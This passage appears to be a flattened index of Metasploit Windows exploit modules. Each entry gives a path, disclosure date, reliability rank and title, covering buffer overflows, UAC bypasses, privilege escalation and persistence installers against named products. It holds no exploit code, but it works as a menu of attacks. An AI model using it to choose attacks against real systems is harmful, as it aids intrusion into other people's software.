windows/http/osb_uname_jlist 2010-07-13 excellent No Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability + 1496 windows/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow + 1497 windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow + 1498 windows/http/privatewire_gateway 2006-06-26 average No Private Wire Gateway Buffer Overflow + 1499 windows/http/psoproxy91_overflow 2004-02-20 average Yes PSO Proxy v0.91 Stack Buffer Overflow + 1500 windows/http/rabidhamster_r4_log 2012-02-09 normal Yes RabidHamster R4 Log Entry sprintf() Buffer Overflow + 1501 windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution + 1502 windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow + 1503 windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution + 1504 windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection + 1505 windows/http/sapdb_webtools 2007-07-05 great No SAP DB 7.4 WebTools Buffer Overflow + 1506 windows/http/savant_31_overflow 2002-09-10 great Yes Savant 3.1 Web Server Overflow + 1507 windows/http/sepm_auth_bypass_rce 2015-07-31 excellent No Symantec Endpoint Protection Manager Authentication Bypass and Code Execution + 1508 windows/http/serviio_checkstreamurl_cmd_exec 2017-05-03 excellent Yes Serviio Media Server checkStreamUrl Command Execution + 1509 windows/http/servu_session_cookie 2009-11-01 good Yes Rhinosoft Serv-U Session Cookie Buffer Overflow + 1510 windows/http/shoutcast_format 2004-12-23 average Yes SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow + 1511 windows/http/shttpd_post 2006-10-06 average No SHTTPD URI-Encoded POST Request Overflow + 1512 windows/http/solarwinds_fsm_userlogin 2015-03-13 excellent Yes Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability + 1513 windows/http/solarwinds_storage_manager_sql 2011-12-07 excellent Yes Solarwinds Storage Manager 5.1.0 SQL Injection + 1514 windows/http/sonicwall_scrutinizer_sqli 2012-07-22 excellent Yes Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection + 1515 windows/http/steamcast_useragent 2008-01-24 average Yes Streamcast HTTP User-Agent Buffer Overflow + 1516 windows/http/sws_connection_bof 2012-07-20 normal Yes Simple Web Server Connection Header Buffer Overflow + 1517 windows/http/sybase_easerver 2005-07-25 average No Sybase EAServer 5.2 Remote Stack Buffer Overflow + 1518 windows/http/syncbreeze_bof 2017-03-15 great Yes Sync Breeze Enterprise GET Buffer Overflow + 1519 windows/http/sysax_create_folder 2012-07-29 normal No Sysax Multi Server 5.64 Create Folder Buffer Overflow + 1520 windows/http/trackercam_phparg_overflow 2005-02-18 average Yes TrackerCam PHP Argument Buffer Overflow + 1521 windows/http/trackit_file_upload 2014-10-07 excellent Yes Numara / BMC Track-It! FileStorageService Arbitrary File Upload + 1522 windows/http/trendmicro_officescan 2007-06-28 good No Trend Micro OfficeScan Remote Stack Buffer Overflow + 1523 windows/http/trendmicro_officescan_widget_exec 2017-10-07 excellent Yes Trend Micro OfficeScan Remote Code Execution + 1524 windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow + 1525 windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution + 1526 windows/http/vmware_vcenter_chargeback_upload 2013-05-15 excellent Yes VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload + 1527 windows/http/vxsrchs_bof 2017-03-15 great Yes VX Search Enterprise GET Buffer Overflow + 1528 windows/http/webster_http 2002-12-02 average No Webster HTTP Server GET Buffer Overflow + 1529 windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload + 1530 windows/http/xitami_if_mod_since 2007-09-24 average Yes Xitami 2.5c2 Web Server If-Modified-Since Overflow + 1531 windows/http/zenworks_assetmgmt_uploadservlet 2011-11-02 excellent No Novell ZENworks Asset Management Remote Execution + 1532 windows/http/zenworks_uploadservlet 2010-03-30 excellent No Novell ZENworks Configuration Management Remote Execution + 1533 windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow + 1534 windows/iis/iis_webdav_upload_asp 1994-01-01 excellent No Microsoft IIS WebDAV Write Access Code Execution + 1535 windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow + 1536 windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution + 1537 windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow + 1538 windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow + 1539 windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow + 1540 windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow + 1541 windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution + 1542 windows/imap/eudora_list 2005-12-20 great Yes Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow + 1543 windows/imap/imail_delete 2004-11-12 average No IMail IMAP4D Delete Overflow + 1544 windows/imap/ipswitch_search 2007-07-18 average No Ipswitch IMail IMAP SEARCH Buffer Overflow + 1545 windows/imap/mailenable_login 2006-12-11 great No MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow + 1546 windows/imap/mailenable_status 2005-07-13 great No MailEnable IMAPD (1.54) STATUS Request Buffer Overflow + 1547 windows/imap/mailenable_w3c_select 2005-10-03 great Yes MailEnable IMAPD W3C Logging Buffer Overflow + 1548 windows/imap/mdaemon_cram_md5 2004-11-12 great No Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow + 1549 windows/imap/mdaemon_fetch 2008-03-13 great Yes MDaemon 9.6.4 IMAPD FETCH Buffer Overflow + 1550 windows/imap/mercur_imap_select_overflow 2006-03-17 average No Mercur v5.0 IMAP SP3 SELECT Buffer Overflow + 1551 windows/imap/mercur_login 2006-03-17 average No Mercur Messaging 2005 IMAP Login Buffer Overflow + 1552 windows/imap/mercury_login 2007-03-06 normal Yes Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow + 1553 windows/imap/mercury_rename 2004-11-29 average Yes Mercury/32 v4.01a IMAP RENAME Buffer Overflow + 1554 windows/imap/novell_netmail_append 2006-12-23 average No Novell NetMail IMAP APPEND Buffer Overflow + 1555 windows/imap/novell_netmail_auth 2007-01-07 average No Novell NetMail IMAP AUTHENTICATE Buffer Overflow + 1556 windows/imap/novell_netmail_status 2005-11-18 average No Novell NetMail IMAP STATUS Buffer Overflow + 1557 windows/imap/novell_netmail_subscribe 2006-12-23 average No Novell NetMail IMAP SUBSCRIBE Buffer Overflow + 1558 windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow + 1559 windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow + 1560 windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow + 1561 windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow + 1562 windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow + 1563 windows/ldap/imail_thc 2004-02-17 average No IMail LDAP Service Buffer Overflow + 1564 windows/ldap/pgp_keyserver7 2001-07-16 good No Network Associates PGP KeyServer 7 LDAP Buffer Overflow + 1565 windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow + 1566 windows/license/calicserv_getconfig 2005-03-02 normal Yes Computer Associates License Server GETCONFIG Overflow + 1567 windows/license/flexnet_lmgrd_bof 2012-03-23 normal No FlexNet License Server Manager lmgrd Buffer Overflow + 1568 windows/license/sentinel_lm7_udp 2005-03-07 average Yes SentinelLM UDP Buffer Overflow + 1569 windows/local/adobe_sandbox_adobecollabsync 2013-05-14 great Yes AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass + 1570 windows/local/agnitum_outpost_acs 2013-08-02 excellent Yes Agnitum Outpost Internet Security Local Privilege Escalation + 1571 windows/local/alpc_taskscheduler 2018-08-27 normal No Microsoft Windows ALPC Task Scheduler Local Privilege Elevation + 1572 windows/local/always_install_elevated 2010-03-18 excellent Yes Windows AlwaysInstallElevated MSI + 1573 windows/local/applocker_bypass 2015-08-03 excellent No AppLocker Execution Prevention Bypass + 1574 windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs + 1575 windows/local/bthpan 2014-07-18 average Yes MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation + 1576 windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass + 1577 windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) + 1578 windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) + 1579 windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) + 1580 windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) + 1581 windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS + 1582 windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) + 1583 windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) + 1584 windows/local/capcom_sys_exec 1999-01-01 normal Yes Windows Capcom.sys Kernel Execution Exploit (x64 only) + 1585 windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token + 1586 windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability + 1587 windows/local/ikeext_service 2012-10-09 good Yes IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL + 1588 windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation + 1589 windows/local/lenovo_systemupdate 2015-04-12 excellent Yes Lenovo System Update Privilege Escalation + 1590 windows/local/mov_ss 2018-05-08 excellent No Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability + 1591 windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation + 1592 windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D + 1593 windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation + 1594 windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation + 1595 windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation + 1596 windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) + 1597 windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page + 1598 windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape + 1599 windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape + 1600 windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference + 1601 windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference + 1602 windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape + 1603 windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit + 1604 windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow + 1605 windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Recieve Notification Exploit + 1606 windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation + 1607 windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation + 1608 windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC + 1609 windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) + 1610 windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference + 1611 windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation + 1612 windows/local/novell_client_nicm 2013-05-22 average Yes Novell Client 2 SP3 nicm.sys Local Privilege Escalation + 1613 windows/local/novell_client_nwfs 2008-06-26 average No Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation + 1614 windows/local/ntapphelpcachecontrol 2014-09-30 normal Yes MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check + 1615 windows/local/nvidia_nvsvc 2012-12-25 average Yes Nvidia (nvsvc) Display Driver Service Local Privilege Escalation + 1616 windows/local/panda_psevents 2016-06-27 excellent Yes Panda Security PSEvents Privilege Escalation + 1617 windows/local/payload_inject 2011-10-12 excellent No Windows Manage Memory Payload Injection + 1618 windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer + 1619 windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer + 1620 windows/local/powershell_cmd_upgrade 1999-01-01 excellent No Windows Command Shell Upgrade (Powershell) + 1621 windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution + 1622 windows/local/ppr_flatten_rec 2013-05-15 average Yes Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation + 1623 windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution + 1624 windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell + 1625 windows/local/pxeexploit 2011-08-05 excellent No PXE Exploit Server + 1626 windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess + 1627 windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence + 1628 windows/local/run_as 1999-01-01 excellent No Windows Run Command As User + 1629 windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer + 1630 windows/local/service_permissions 2012-10-15 great No Windows Escalate Service Permissions Local Privilege Escalation + 1631 windows/local/trusted_service_path 2001-10-25 excellent Yes Windows Service Trusted Path Privilege Escalation + 1632 windows/local/virtual_box_guest_additions 2014-07-15 average Yes VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation + 1633 windows/local/virtual_box_opengl_escape 2014-03-11 average Yes VirtualBox 3D Acceleration Virtual Machine Escape + 1634 windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy + 1635 windows/local/webexec 2018-10-09 good Yes WebEx Local Service Permissions Exploit + 1636 windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution + 1637 windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence + 1638 windows/lotus/domino_http_accept_language 2008-05-20 average No IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow + 1639 windows/lotus/domino_icalendar_organizer 2010-09-14 normal Yes IBM Lotus Domino iCalendar MAILTO Buffer Overflow + 1640 windows/lotus/domino_sametime_stmux 2008-05-21 average Yes IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow + 1641 windows/lotus/lotusnotes_lzh 2011-05-24 normal No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) + 1642 windows/lpd/hummingbird_exceed 2005-05-27 average No Hummingbird Connectivity 10 SP5 LPD Buffer Overflow + 1643 windows/lpd/niprint 2003-11-05 good No NIPrint LPD Request Overflow + 1644 windows/lpd/saplpd 2008-02-04 good No SAP SAPLPD 6.28 Buffer Overflow + 1645 windows/lpd/wincomlpd_admin 2008-02-04 good No WinComLPD Buffer Overflow + 1646 windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow + 1647 windows/misc/actfax_raw_server_bof 2013-02-05 normal No ActFax 5.01 RAW Server Buffer Overflow + 1648 windows/misc/agentxpp_receive_agentx 2010-04-16 good No AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow + 1649 windows/misc/ais_esel_server_rce 2019-03-27 excellent Yes AIS logistics ESEL-Server Unauth SQL Injection RCE + 1650 windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow + 1651 windows/misc/altiris_ds_sqli 2008-05-15 normal Yes Symantec Altiris DS SQL Injection + 1652 windows/misc/apple_quicktime_rtsp_response 2007-11-23 normal No Apple QuickTime 7.3 RTSP Response Header Buffer Overflow + 1653 windows/misc/asus_dpcproxy_overflow 2008-03-21 average No Asus Dpcproxy Buffer Overflow + 1654 windows/misc/avaya_winpmd_unihostrouter 2011-05-23 normal No Avaya WinPMD UniteHostRouter Buffer Overflow + 1655 windows/misc/avidphoneticindexer 2011-11-29 normal No Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow + 1656 windows/misc/bakbone_netvault_heap 2005-04-01 average Yes BakBone NetVault Remote Heap Overflow + 1657 windows/misc/bcaaa_bof 2011-04-04 good No Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow + 1658 windows/misc/bigant_server 2008-04-15 average No BigAnt Server 2.2 Buffer Overflow + 1659 windows/misc/bigant_server_250 2008-04-15 great No BigAnt Server 2.50 SP1 Buffer Overflow + 1660 windows/misc/bigant_server_dupf_upload 2013-01-09 excellent No BigAnt Server DUPF Command Arbitrary File Upload + 1661 windows/misc/bigant_server_sch_dupf_bof 2013-01-09 normal No BigAnt Server 2 SCH And DUPF Buffer Overflow + 1662 windows/misc/bigant_server_usv 2009-12-29 great No BigAnt Server 2.52 USV Buffer Overflow + 1663 windows/misc/bomberclone_overflow 2006-02-16 average No Bomberclone 0.11.6 Buffer Overflow + 1664 windows/misc/bopup_comm 2009-06-18 good No Bopup Communications Server Buffer Overflow + 1665 windows/misc/borland_interbase 2007-07-24 average No Borland Interbase Create-Request Buffer Overflow + 1666 windows/misc/borland_starteam 2008-04-02 average No Borland CaliberRM StarTeam Multicast Service Buffer Overflow + 1667 windows/misc/citrix_streamprocess 2011-01-20 good No Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow + 1668 windows/misc/citrix_streamprocess_data_msg 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow + 1669 windows/misc/citrix_streamprocess_get_boot_record_request 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow + 1670 windows/misc/citrix_streamprocess_get_footer 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow + 1671 windows/misc/citrix_streamprocess_get_objects 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow + 1672 windows/misc/cloudme_sync 2018-01-17 great No CloudMe Sync v1.10.9 + 1673 windows/misc/commvault_cmd_exec 2017-12-12 good No Commvault Communications Service (cvd) Command Injection + 1674 windows/misc/disk_savvy_adm 2017-01-31 great No Disk Savvy Enterprise v10.4.18 + 1675 windows/misc/doubletake 2008-06-04 average No DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow + 1676 windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow + 1677 windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow + 1678 windows/misc/enterasys_netsight_syslog_bof 2011-12-19 normal No Enterasys NetSight nssyslogd.exe Buffer Overflow + 1679 windows/misc/eureka_mail_err 2009-10-22 normal No Eureka Email 2.2q ERR Remote Buffer Overflow + 1680 windows/misc/fb_cnct_group 2013-01-31 normal Yes Firebird Relational Database CNCT Group Number Buffer Overflow + 1681 windows/misc/fb_isc_attach_database 2007-10-03 average No Firebird Relational Database isc_attach_database() Buffer Overflow + 1682 windows/misc/fb_isc_create_database 2007-10-03 average No Firebird Relational Database isc_create_database() Buffer Overflow + 1683 windows/misc/fb_svc_attach 2007-10-03 average No Firebird Relational Database SVC_attach() Buffer Overflow + 1684 windows/misc/gh0st 2017-07-27 normal Yes Gh0st Client buffer Overflow + 1685 windows/misc/gimp_script_fu 2012-05-18 normal No GIMP script-fu Server Buffer Overflow + 1686 windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution + 1687 windows/misc/hp_dataprotector_crs 2013-06-03 normal Yes HP Data Protector Cell Request Service Buffer Overflow + 1688 windows/misc/hp_dataprotector_dtbclslogin 2010-09-09 normal Yes HP Data Protector DtbClsLogin Buffer Overflow + 1689 windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution + 1690 windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution + 1691 windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service + 1692 windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow + 1693 windows/misc/hp_dataprotector_traversal 2014-01-02 great Yes HP Data Protector Backup Client Service Directory Traversal + 1694 windows/misc/hp_imc_dbman_restartdb_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestartDB Unauthenticated RCE + 1695 windows/misc/hp_imc_dbman_restoredbase_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestoreDBase Unauthenticated RCE + 1696 windows/misc/hp_imc_uam 2012-08-29 normal No HP Intelligent Management Center UAM Buffer Overflow + 1697 windows/misc/hp_loadrunner_magentproc 2013-07-27 normal No HP LoadRunner magentproc.exe Overflow + 1698 windows/misc/hp_loadrunner_magentproc_cmdexec 2010-05-06 excellent No HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution + 1699 windows/misc/hp_magentservice 2012-01-12 average No HP Diagnostics Server magentservice.exe Overflow + 1700 windows/misc/hp_omniinet_1 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + 1701 windows/misc/hp_omniinet_2 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + 1702 windows/misc/hp_omniinet_3 2011-06-29 great Yes HP OmniInet.exe Opcode 27 Buffer Overflow + 1703 windows/misc/hp_omniinet_4 2011-06-29 good No HP OmniInet.exe Opcode 20 Buffer Overflow + 1704 windows/misc/hp_operations_agent_coda_34 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow + 1705 windows/misc/hp_operations_agent_coda_8c 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow + 1706 windows/misc/hp_ovtrace 2007-08-09 average No HP OpenView Operations OVTrace Buffer Overflow + 1707 windows/misc/hta_server 2016-10-06 manual No HTA Web Server + 1708 windows/misc/ib_isc_attach_database 2007-10-03 good No Borland InterBase isc_attach_database() Buffer Overflow + 1709 windows/misc/ib_isc_create_database 2007-10-03 good No Borland InterBase isc_create_database() Buffer Overflow + 1710 windows/misc/ib_svc_attach 2007-10-03 good No Borland InterBase SVC_attach() Buffer Overflow + 1711 windows/misc/ibm_cognos_tm1admsd_bof 2012-04-02 normal No IBM Cognos tm1admsd.exe Overflow + 1712 windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection + 1713 windows/misc/ibm_tsm_cad_ping 2009-11-04 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + 1714 windows/misc/ibm_tsm_rca_dicugetidentify 2009-11-04 great No IBM Tivoli Storage Manager Express RCA Service Buffer Overflow + 1715 windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability + 1716 windows/misc/itunes_extm3u_bof 2012-06-21 normal No Apple iTunes 10 Extended M3U Stack Buffer Overflow + 1717 windows/misc/landesk_aolnsrvr 2007-04-13 average No LANDesk Management Suite 8.7 Alert Service Buffer Overflow + 1718 windows/misc/lianja_db_net 2013-05-22 normal Yes Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow + 1719 windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution + 1720 windows/misc/mercury_phonebook 2005-12-19 average No Mercury/32 PH Server Module Buffer Overflow + 1721 windows/misc/mini_stream 2009-12-25 normal No Mini-Stream 3.0.1.1 Buffer Overflow + 1722 windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow + 1723 windows/misc/ms07_064_sami 2007-12-11 normal No MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow + 1724 windows/misc/ms10_104_sharepoint 2010-12-14 excellent Yes MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution + 1725 windows/misc/netcat110_nt 2004-12-27 great No Netcat v1.10 NT Stack Buffer Overflow + 1726 windows/misc/nettransport 2010-01-02 normal No NetTransport Download Manager 2.90.510 Buffer Overflow + 1727 windows/misc/nvidia_mental_ray 2013-12-10 excellent No Nvidia Mental Ray Satellite Service Arbitrary DLL Injection + 1728 windows/misc/plugx 2017-07-27 normal Yes PlugX Controller Stack Overflow + 1729 windows/misc/poisonivy_21x_bof 2016-06-03 normal Yes Poison Ivy 2.1.x C2 Buffer Overflow + 1730 windows/misc/poisonivy_bof 2012-06-24 normal Yes Poison Ivy Server Buffer Overflow + 1731 windows/misc/poppeeper_date 2009-02-27 normal No POP Peeper v3.4 DATE Buffer Overflow + 1732 windows/misc/poppeeper_uidl 2009-02-27 normal No POP Peeper v3.4 UIDL Buffer Overflow + 1733 windows/misc/realtek_playlist 2008-12-16 great No Realtek Media Player Playlist Buffer Overflow + 1734 windows/misc/sap_2005_license 2009-08-01 great No SAP Business One License Manager 2005 Buffer Overflow + 1735 windows/misc/sap_netweaver_dispatcher 2012-05-08 normal No SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow + 1736 windows/misc/shixxnote_font 2004-10-04 great No ShixxNOTE 6.net Font Field Overflow + 1737 windows/misc/solidworks_workgroup_pdmwservice_file_write 2014-02-22 good Yes SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write + 1738 windows/misc/splayer_content_type 2011-05-04 normal No SPlayer 3.7 Content-Type Buffer Overflow + 1739 windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow + 1740 windows/misc/talkative_response 2009-03-17 normal No Talkative IRC v0.4.4.16 Response Buffer Overflow + 1741 windows/misc/tiny_identd_overflow 2007-05-14 average No TinyIdentD 2.2 Stack Buffer Overflow + 1742 windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow + 1743 windows/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow + 1744 windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector + 1745 windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server + 1746 windows/misc/windows_rsh 2007-07-24 average No Windows RSH Daemon Buffer Overflow + 1747 windows/misc/wireshark_lua 2011-07-18 excellent No Wireshark console.lua Pre-Loading Script Execution + 1748 windows/misc/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow + 1749 windows/mmsp/ms10_025_wmss_connect_funnel 2010-04-13 great No Windows Media Services ConnectFunnel Stack Buffer Overflow + 1750 windows/motorola/timbuktu_fileupload 2008-05-10 excellent No Timbuktu Pro Directory Traversal/File Upload + 1751 windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent No Lyris ListManager MSDE Weak sa Password + 1752 windows/mssql/ms02_039_slammer 2002-07-24 good Yes MS02-039 Microsoft SQL Server Resolution Overflow + 1753 windows/mssql/ms02_056_hello 2002-08-05 good Yes MS02-056 Microsoft SQL Server Hello Overflow + 1754 windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption + 1755 windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection + 1756 windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution + 1757 windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution + 1758 